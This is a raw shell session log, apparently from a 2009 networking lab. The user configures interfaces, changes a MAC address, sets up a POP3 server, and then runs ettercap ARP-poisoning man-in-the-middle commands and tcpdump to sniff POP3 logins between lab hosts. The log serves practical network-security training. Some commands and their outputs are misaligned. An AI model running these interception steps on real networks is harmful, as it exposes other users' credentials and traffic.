17:45:13
|
$ifconfig
bash: ifconfig: command not found |
| /l3/users/27-07-2009/nt-lnet/debian7.net.nt/user :1 :2 :3 :4 :5 :6 :7 :8 :9 :10 :11 :12 :13 :14 :15 :16 :17 :18 |
|
|
$sudo
Password:
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:00:07
inet addr:192.168.16.7 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe00:7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4339 errors:0 dropped:0 overruns:0 frame:0
TX packets:3958 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:454928 (444.2 KiB) TX bytes:1319361 (1.2 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
|
$ssh 192.168.16.27
The authenticity of host '192.168.16.27 (192.168.16.27)' can't be established.
DSA key fingerprint is 13:3f:fb:2a:53:62:8e:f8:0e:c7:3a:c9:10:99:b6:25.
Are you sure you want to continue connecting (yes/no)? ywa
Please type 'yes' or 'no': yes
Failed to add the host to the list of known hosts (/home/user/.ssh/known_hosts).
Password:
Last login: Fri Jul 24 21:10:19 2009
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 6.3-RELEASE (SMP) #0: Wed Jan 16 04:45:45 UTC 2008
...
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are
unfamiliar with FreeBSD's directory layout, please refer to the hier(7)
manual page. If you are not familiar with manual pages, type `man man'.
You may also use sysinstall(8) to re-enter the installation and
configuration utility. Edit /etc/motd to change this login announcement.
|
|
#[user@fbsd7:~]$ ifconfig
re0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=1b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING>
inet 192.168.16.27 netmask 0xffffff00 broadcast 192.168.16.255
ether 00:16:3e:44:00:07
media: Ethernet autoselect (100baseTX <full-duplex>)
status: active
plip0: flags=108810<POINTOPOINT,SIMPLEX,MULTICAST,NEEDSGIANT> mtu 1500
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet6 ::1 prefixlen 128
inet 127.0.0.1 netmask 0xff000000
|
|
#[user@fbsd7:~]$ man -a re
[user@fbsd7:~]$ man re
re(3) Perl Programmers Reference Guide re(3)
NAME
re - Perl pragma to alter regular expression behaviour
SYNOPSIS
use re 'taint';
($x) = ($^X =~ /^(.*)$/s); # $x is tainted here
$pat = '(?{ $foo = 1 })';
use re 'eval';
/foo${pat}bar/; # won't fail (when not under -T switch)
...
full-duplex or half-duplex modes.
1000baseTX Set 1000baseTX operation over twisted pair. The RealTek
gigE chips support 1000Mbps in full-duplex mode only.
The re driver supports the following media options:
full-duplex Force full duplex operation.
half-duplex Force half duplex operation.
For more information on configuring this device, see ifconfig(8).
HARDWARE
The re driver supports RealTek RTL8139C+, RTL8169, RTL816xS, RTL811xS,
and RTL8101E based Fast Ethernet and Gigabit Ethernet adapters including:
|
|
#[user@fbsd7:~]$ ifconfig
re0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=1b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING>
inet 192.168.16.27 netmask 0xffffff00 broadcast 192.168.16.255
ether 00:16:3e:44:00:07
media: Ethernet autoselect (100baseTX <full-duplex>)
status: active
plip0: flags=108810<POINTOPOINT,SIMPLEX,MULTICAST,NEEDSGIANT> mtu 1500
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet6 ::1 prefixlen 128
inet 127.0.0.1 netmask 0xff000000
|
|
#[user@fbsd7:~]$
[user@fbsd7:~]$ ifconfig -a
re0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=1b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING>
inet 192.168.16.27 netmask 0xffffff00 broadcast 192.168.16.255
ether 00:16:3e:44:00:07
media: Ethernet autoselect (100baseTX <full-duplex>)
status: active
plip0: flags=108810<POINTOPOINT,SIMPLEX,MULTICAST,NEEDSGIANT> mtu 1500
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
inet6 ::1 prefixlen 128
inet 127.0.0.1 netmask 0xff000000
|
|
#[user@fbsd7:~]$
|
|
#[user@fbsd7:~]$
[user@fbsd7:~]$ |
|
#[user@fbsd7:~]$ exit
exit Connection to 192.168.16.27 closed. |
|
$sudo ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:00:07
inet addr:192.168.16.7 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe00:7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6502 errors:0 dropped:0 overruns:0 frame:0
TX packets:6698 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:627993 (613.2 KiB) TX bytes:1907089 (1.8 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
|
$sudo ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:00:07
inet addr:192.168.16.7 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe00:7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6629 errors:0 dropped:0 overruns:0 frame:0
TX packets:6868 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:636479 (621.5 KiB) TX bytes:1945688 (1.8 MiB)
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:01:07
BROADCAST MULTICAST MTU:1500 Metric:1
...
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
|
$sudo ifconfig eth1 172.17.0.1
[user@debian7:~]$ sudo ifconfig -a | less
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:00:07
inet addr:192.168.16.7 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe00:7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6890 errors:0 dropped:0 overruns:0 frame:0
TX packets:7244 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:653965 (638.6 KiB) TX bytes:2026249 (1.9 MiB)
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:01:07
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
eth2 Link encap:Ethernet HWaddr 00:16:3E:00:02:07
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
|
$sudo ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:00:07
inet addr:192.168.16.7 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe00:7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7555 errors:0 dropped:0 overruns:0 frame:0
TX packets:8154 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:699509 (683.1 KiB) TX bytes:2283641 (2.1 MiB)
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:01:07
inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0
...
collisions:0 txqueuelen:1000
RX bytes:378 (378.0 b) TX bytes:238 (238.0 b)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
|
$sudo ifconfig eth1 0.0.0.0
|
|
$sudo ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:00:07
inet addr:192.168.16.7 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe00:7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7863 errors:0 dropped:0 overruns:0 frame:0
TX packets:8591 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:720321 (703.4 KiB) TX bytes:2397176 (2.2 MiB)
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:01:07
inet6 addr: fe80::216:3eff:fe00:107/64 Scope:Link
...
collisions:0 txqueuelen:1000
RX bytes:378 (378.0 b) TX bytes:468 (468.0 b)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
|
$sudo ifconfig eth1 down
|
|
$sudo ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:00:07
inet addr:192.168.16.7 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe00:7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8210 errors:0 dropped:0 overruns:0 frame:0
TX packets:9082 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:743937 (726.5 KiB) TX bytes:2512548 (2.3 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
|
$sudo ifconfig eth1
eth1 Link encap:Ethernet HWaddr 00:16:3E:00:01:07
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:5 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:378 (378.0 b) TX bytes:468 (468.0 b)
|
|
$sudo ifconfig eth1 hw ether 00:16:3e:11:11:07
|
|
$sudo ifconfig eth1
eth1 Link encap:Ethernet HWaddr 00:16:3E:11:11:07
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:5 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:378 (378.0 b) TX bytes:468 (468.0 b)
|
|
$vim 'echo "up ifconfig eth1 hw ether 00:16:3e:11:11:07" >>
|
|
$sudo
auto lo eth0
iface lo inet loopback
address 192.168.16.7
iface etnetmask 255.255.255.0
gateway 192.168.16.254
up ifconfig eth1 hw ether 00:16:3e:11:11:07
"/etc/network/interfaces" 8L, 198C
|
|
$echo "2^64|bc"
2^64|bc |
|
$echo
bash: bc: command not found |
|
$echo 2^64|bc
[user@debian7:~]$ sudo Чтение списков пакетов... Готово Построение дерева зависимостей... Готово НОВЫЕ пакеты, которые будут установлены: bc обновлено 0, установлено 1 новых пакетов, для удаления отмечено 0 пакетов, и 55 пакетов не обновлено. Необходимо скачать 66,2kБ архивов. После распаковки объем занятого дискового пространства возрастёт на 193kB. Получено:1 http://debian.org.ua etch/main bc 1.06-20 [66,2kB] Получено 66,2kB за 0s (755kB/c) Выбор ранее не выбранного пакета bc. (Чтение базы данных... на данный момент установлено 22620 файлов и каталогов.) Распаковывается пакет bc (из файла .../archives/bc_1.06-20_i386.deb)... Настраивается пакет bc (1.06-20) ... 18446744073709551616 |
|
$LANG=C
|
|
$echo 2^32|bc
[user@debian7:~]$ echo 2^48|bc 281474976710656 4294967296 |
|
$echo 2^128|bc
[user@debian7:~]$ echo 2^32|bc 4294967296 340282366920938463463374607431768211456 |
|
$man mactab
|
|
$sudo ifconfig eth1 hw ether 00:16:3e:11:11:07
ifconfig eth1
>> /etc/network/interfaces' 'echo "up ifconfig eth1 hw ether 00:16:3e:11:11:07"
|
|
$ssh 192.168.16.5
[user@debian7:~]$ The authenticity of host '192.168.16.5 (192.168.16.5)' can't be established. RSA key fingerprint is 51:5b:32:d8:70:19:6d:04:c7:b4:11:49:13:74:dc:bc. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/user/.ssh/known_hosts). user@192.168.16.5's password: Linux debiant 2.6.18-5-xen-686 #1 SMP Fri Jun 1 05:05:24 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Jul 27 18:37:45 2009 |
|
$sudo apt-get install popa3d
Password: Чтение списков пакетов... Готово Построение дерева зависимостей... Готово Рекомендуемые пакеты: exim4 mail-transport-agent НОВЫЕ пакеты, которые будут установлены: popa3d обновлено 0, установлено 1 новых пакетов, для удаления отмечено 0 пакетов, и 55 пакетов не обновлено. Необходимо скачать 32,4kБ архивов. После распаковки объем занятого дискового пространства возрастёт на 94,2kB. ... Распаковывается пакет popa3d (из файла .../popa3d_1.0.2-3_i386.deb)... Настраивается пакет popa3d (1.0.2-3) ... Добавляется группа `popa3d' (GID 104) ... Готово. Предупреждение: указанный домашний каталог уже существует. Добавляется системный пользователь `popa3d' (UID 102) ... Добавляется новый пользователь `popa3d' (UID 102) в группу `popa3d' ... Домашний каталог `/var/lib/popa3d' уже существует. Не копируется из `/etc/skel'. adduser: Предупреждение: данный домашний каталог не принадлежит пользователю, который сейчас создаётся. Starting pop daemon: popa3d. |
|
$exit
exit Connection to 192.168.16.5 closed. |
|
$telnet 192.168.16.5 110
Trying 192.168.16.5... Connected to 192.168.16.5. Escape character is '^]'. +OK USER user +OK PASS password +OK LIST +OK . QUIT +OK Connection closed by foreign host. |
|
$sudo apt-get install ettercap
Чтение списков пакетов... Готово Построение дерева зависимостей... Готово Будут установлены следующие дополнительные пакеты: ettercap-common libltdl3 libnet1 libpcap0.8 libpcre3 НОВЫЕ пакеты, которые будут установлены: ettercap ettercap-common libltdl3 libnet1 libpcap0.8 libpcre3 обновлено 0, установлено 6 новых пакетов, для удаления отмечено 0 пакетов, и 55 пакетов не обновлено. Необходимо скачать 1007kБ архивов. После распаковки объем занятого дискового пространства возрастёт на 2523kB. Хотите продолжить [Д/н]? Y ... Выбор ранее не выбранного пакета ettercap-common. Распаковывается пакет ettercap-common (из файла .../ettercap-common_1%3a0.7.3-1.2_i386.deb)... Выбор ранее не выбранного пакета ettercap. Распаковывается пакет ettercap (из файла .../ettercap_1%3a0.7.3-1.2_i386.deb)... Настраивается пакет libpcre3 (6.7+7.4-4) ... Настраивается пакет libltdl3 (1.5.22-4) ... Настраивается пакет libnet1 (1.1.2.1-2) ... Настраивается пакет libpcap0.8 (0.9.5-1) ... Настраивается пакет ettercap-common (0.7.3-1.2) ... Настраивается пакет ettercap (0.7.3-1.2) ... |
|
$w
[user@debian7:~]$ man ettercap
Переформатирование ettercap(8), подождите...
ETTERCAP(8) ETTERCAP(8)
NAME
ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks
***** IMPORTANT NOTE ******
Since ettercap NG (formerly 0.7.0), all the options have been changed. Even the target specification
has been changed. Please read carefully this man page.
SYNOPSIS
ettercap [OPTIONS] [TARGET1] [TARGET2]
...
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user ttyp0 192.168.16.6 18:42 2:49m 0.10s 0.08s script -f -q /home/user/.lilalo//216364573305597
user :0 - 18:40 ?xdm? 18.08s 0.10s /usr/bin/fluxbox
user ttyp2 :0.0 18:40 0.00s 0.07s 0.06s script -f -q /home/user/.lilalo//307032993730586
user ttyp4 192.168.16.5 18:41 2:44m 0.08s 0.08s script -f -q /home/user/.lilalo//605425115913424
user ttyp6 :ttyp3:S.0 19:07 0.00s 0.10s 0.10s script -f -q /home/user/.lilalo//78546274143674-
user ttyp8 192.168.16.4 18:41 2:46m 0.08s 0.08s script -f -q /home/user/.lilalo//186012587970461
user ttypa fbsd26.net.nt 18:42 2:40m 0.08s 0.08s script -f -q /home/user/.lilalo//622514810113152
user ttypc fbsd25.net.nt 18:42 2:44m 0.07s 0.07s script -f -q /home/user/.lilalo//310322548123064
user ttype fbsd24.net.nt 18:42 2:17m 0.09s 0.09s script -f -q /home/user/.lilalo//281902027276482
|
|
$man ettercap
|
|
$ettercap -T -L log
bash: ettercap: command not found |
|
$sudo
Mon Jul 27 19:14:21 2009 TCP 192.168.16.5:23 --> 192.168.16.4:54032 | RA Mon Jul 27 19:14:26 2009 TCP 192.168.16.4:59206 --> 192.168.16.5:110 | S Mon Jul 27 19:14:26 2009 TCP 192.168.16.5:110 --> 192.168.16.4:59206 | SA Mon Jul 27 19:14:26 2009 TCP 192.168.16.4:59206 --> 192.168.16.5:110 | A Mon Jul 27 19:14:26 2009 TCP 192.168.16.5:110 --> 192.168.16.4:59206 | AP ... Mon Jul 27 19:14:52 2009 TCP 192.168.16.4:59206 --> 192.168.16.5:110 | AP USER user. Mon Jul 27 19:15:05 2009 TCP 192.168.16.4:59206 --> 192.168.16.5:110 | AP USER user. Mon Jul 27 19:15:18 2009 TCP 192.168.16.5:110 --> 192.168.16.4:59206 | AP +OK. User requested a CTRL+C... (deprecated, next time use proper shutdown) |
|
$sudo etterlog
Mon Jul 27 19:16:15 2009 TCP 192.168.16.4:59207 --> 192.168.16.5:110 | S Mon Jul 27 19:16:15 2009 TCP 192.168.16.5:110 --> 192.168.16.4:59207 | SA Mon Jul 27 19:16:15 2009 TCP 192.168.16.4:59207 --> 192.168.16.5:110 | A Mon Jul 27 19:16:15 2009 TCP 192.168.16.5:110 --> 192.168.16.4:59207 | AP +OK. Mon Jul 27 19:16:15 2009 ... TCP 192.168.16.5:110 --> 192.168.16.4:59207 | AP +OK. Mon Jul 27 19:16:48 2009 TCP 192.168.16.4:59207 --> 192.168.16.5:110 | AP USER user. User requested a CTRL+C... (deprecated, next time use proper shutdown) .bash_history .dmrc hello log.eci .viminfo .bash_logout .fluxbox/ .l3rc log.ecp .Xauthority .bash_profile .gconf/ .lesshst .mozilla/ .xsession-errors .bashrc .gconfd/ .lilalo/ .ssh/ |
|
$sudo etterlog log.eci
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA Log file version : NG-0.7.3 Timestamp : Mon Jul 27 19:15:36 2009 Type : LOG_INFO 1698 tcp OS fingerprint 7587 mac vendor fingerprint 2183 known services ================================================== IP address : 192.168.16.4 MAC address : 00:16:3E:00:00:04 ... IP address : 192.168.16.5 MAC address : 00:16:3E:00:00:05 MANUFACTURER : DISTANCE : 1 TYPE : LAN host FINGERPRINT : 16A0:05B4:40:07:1:1:1:1:A:3C OPERATING SYSTEM : Linux.2.4.20-web100 PORT : TCP 110 | pop-3 [ ] ================================================== |
|
$man ettercap
|
|
$sudo ettercap -T -L log -M arp /192.168.16.5/
|
|
$ssh 192.168.16.5
The authenticity of host '192.168.16.5 (192.168.16.5)' can't be established. RSA key fingerprint is 51:5b:32:d8:70:19:6d:04:c7:b4:11:49:13:74:dc:bc. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/user/.ssh/known_hosts). user@192.168.16.5's password: Permission denied, please try again. user@192.168.16.5's password: Linux debiant 2.6.18-5-xen-686 #1 SMP Fri Jun 1 05:05:24 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Jul 27 19:07:36 2009 from 192.168.16.7 l3-agent is already running: pid=1491; pidfile=/home/user/.lilalo/l3-agent.pid |
|
$sudo tcpdump -i eth0 -n arp
sudo: tcpdump: command not found |
|
$sudo apt-get install tcpdump
Чтение списков пакетов... Готово Построение дерева зависимостей... Готово Будут установлены следующие дополнительные пакеты: libpcap0.8 НОВЫЕ пакеты, которые будут установлены: libpcap0.8 tcpdump обновлено 0, установлено 2 новых пакетов, для удаления отмечено 0 пакетов, и 55 пакетов не обновлено. Необходимо скачать 392kБ архивов. После распаковки объем занятого дискового пространства возрастёт на 877kB. Хотите продолжить [Д/н]? y Получено:1 http://debian.org.ua etch/main libpcap0.8 0.9.5-1 [89,5kB] Получено:2 http://debian.org.ua etch/main tcpdump 3.9.5-2etch1 [303kB] Получено 392kB за 0s (1278kB/c) Выбор ранее не выбранного пакета libpcap0.8. (Чтение базы данных... на данный момент установлено 22633 файлов и каталогов.) Распаковывается пакет libpcap0.8 (из файла .../libpcap0.8_0.9.5-1_i386.deb)... Выбор ранее не выбранного пакета tcpdump. Распаковывается пакет tcpdump (из файла .../tcpdump_3.9.5-2etch1_i386.deb)... Настраивается пакет libpcap0.8 (0.9.5-1) ... Настраивается пакет tcpdump (3.9.5-2etch1) ... |
|
$sudo tcpdump -i eth0 -n arp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 0 packets captured 0 packets received by filter 0 packets dropped by kernel |
|
$sudo tcpdump -i eth0 -n port 110
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 19:20:06.552287 IP 192.168.16.4.44745 > 192.168.16.5.110: S 1545096721:1545096721(0) win 5840 <mss 1460,sackOK,timestamp 572160 0,nop,wscale 7> 19:20:06.552448 IP 192.168.16.5.110 > 192.168.16.4.44745: S 1552421090:1552421090(0) ack 1545096722 win 5792 <mss 1460,sackOK,timestamp 571661 572160,nop,wscale 7> 19:20:06.552353 IP 192.168.16.4.44745 > 192.168.16.5.110: . ack 1 win 46 <nop,nop,timestamp 572161 571661> 19:20:06.553629 IP 192.168.16.5.110 > 192.168.16.4.44745: P 1:6(5) ack 1 win 46 <nop,nop,timestamp 571661 572161> 19:20:06.553721 IP 192.168.16.4.44745 > 192.168.16.5.110: . ack 6 win 46 <nop,nop,timestamp 572162 571661> 19:20:15.029548 IP 192.168.16.4.44745 > 192.168.16.5.110: P 1:12(11) ack 6 win 46 <nop,nop,timestamp 574280 571661> 19:20:15.029737 IP 192.168.16.5.110 > 192.168.16.4.44745: . ack 12 win 46 <nop,nop,timestamp 573780 574280> 19:20:15.029870 IP 192.168.16.5.110 > 192.168.16.4.44745: P 6:11(5) ack 12 win 46 <nop,nop,timestamp 573780 574280> 19:20:15.030143 IP 192.168.16.4.44745 > 192.168.16.5.110: . ack 11 win 46 <nop,nop,timestamp 574280 573780> 19:20:23.258005 IP 192.168.16.4.44745 > 192.168.16.5.110: P 12:27(15) ack 11 win 46 <nop,nop,timestamp 576337 573780> 19:20:23.260414 IP 192.168.16.5.110 > 192.168.16.4.44745: P 11:16(5) ack 27 win 46 <nop,nop,timestamp 575837 576337> 19:20:23.261309 IP 192.168.16.4.44745 > 192.168.16.5.110: . ack 16 win 46 <nop,nop,timestamp 576338 575837> 12 packets captured 12 packets received by filter 0 packets dropped by kernel |
|
$sudo tcpdump -i eth0 -n
19:20:52.361514 IP 192.168.16.211.1820 > 192.168.16.5.5900: P 1:11(10) ack 13969 win 63712 <nop,nop,timestamp 591178 583100> 19:20:52.361553 IP 192.168.16.5.5900 > 192.168.16.211.1820: . ack 11 win 46 <nop,nop,timestamp 583111 591178> 19:20:52.361600 IP 192.168.16.7.22 > 192.168.16.5.57307: P 93552:93856(304) ack 97 win 90 <nop,nop,timestamp 582112 583109> 19:20:52.361831 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 13969:14123(154) ack 11 win 46 <nop,nop,timestamp 583111 591178> 19:20:52.361917 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 14123:14257(134) ack 11 win 46 <nop,nop,timestamp 583111 591178> 19:20:52.362021 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 14257:14519(262) ack 11 win 46 <nop,nop,timestamp 583111 591178> 19:20:52.362058 IP 192.168.16.211.1820 > 192.168.16.5.5900: . ack 14123 win 63712 <nop,nop,timestamp 591178 583111> 19:20:52.362099 IP 192.168.16.211.1820 > 192.168.16.5.5900: . ack 14257 win 63578 <nop,nop,timestamp 591178 583111> 19:20:52.362153 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 14519:14703(184) ack 11 win 46 <nop,nop,timestamp 583111 591178> 19:20:52.362225 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 14703:14858(155) ack 11 win 46 <nop,nop,timestamp 583111 591178> ... 19:20:52.420183 IP 192.168.16.7.22 > 192.168.16.5.57307: P 182048:182352(304) ack 193 win 90 <nop,nop,timestamp 582125 583120> 19:20:52.420324 IP 192.168.16.7.22 > 192.168.16.5.57307: P 182352:182656(304) ack 193 win 90 <nop,nop,timestamp 582125 583120> 19:20:52.420328 IP 192.168.16.7.22 > 192.168.16.5.57307: P 182656:182960(304) ack 193 win 90 <nop,nop,timestamp 582125 583120> 19:20:52.420330 IP 192.168.16.7.22 > 192.168.16.5.57307: P 182960:183264(304) ack 193 win 90 <nop,nop,timestamp 582125 583120> 19:20:52.420332 IP 192.168.16.7.22 > 192.168.16.5.57307: P 183264:183568(304) ack 193 win 90 <nop,nop,timestamp 582125 583120> 19:20:52.420335 IP 192.168.16.7.22 > 192.168.16.5.57307: P 183568:183872(304) ack 193 win 90 <nop,nop,timestamp 582125 583120> 19:20:52.420337 IP 192.168.16.7.22 > 192.168.16.5.57307: P 183872:184176(304) ack 193 win 90 <nop,nop,timestamp 582125 583120> 19:20:52.420383 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 24707:24854(147) ack 21 win 46 <nop,nop,timestamp 583127 591183> 19:20:52.420469 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 24854:25084(230) ack 21 win 46 <nop,nop,timestamp 583127 591183> 19:20:52.420521 IP 192.168.16.5.5900 > 192.168.16.211.1820: P 25084:25226(142) ack 21 win 46 <nop,nop,timestamp 583127 591183> |
|
$\
> |
|
$exit
[user@debian5:~]$ exit Connection to 192.168.16.5 closed. |
|
$sudo ettercap -T -L log -M arp /192.168.16.5/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Incorrect number of token (//) in TARGET !! |
|
$sudo ettercap -T -M arp /192.168.16.5/ /192.168.16.4/ -L log
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on eth0... (Ethernet) eth0 -> 00:16:3E:00:00:07 192.168.16.7 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Scanning for merged targets (2 hosts)... * |==================================================>| 100.00 % 2 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.16.5 00:16:3E:00:00:05 GROUP 2 : 192.168.16.4 00:16:3E:00:00:04 Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help [1]+ Stopped sudo ettercap -T -M arp /192.168.16.5/ /192.168.16.4/ -L log |
|
$bg
[1]+ sudo ettercap -T -M arp /192.168.16.5/ /192.168.16.4/ -L log & |
|
$arp -an
bash: arp: command not found |
|
$ssh 192.168.16.254
The authenticity of host '192.168.16.254 (192.168.16.254)' can't be established. RSA key fingerprint is 90:7f:6c:4f:4c:b3:6c:3a:73:79:4d:77:f2:82:51:64. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/user/.ssh/known_hosts). user@192.168.16.254's password: |
|
$sudo ettercap -T -M arp /192.168.16.4/ /192.168.16.5
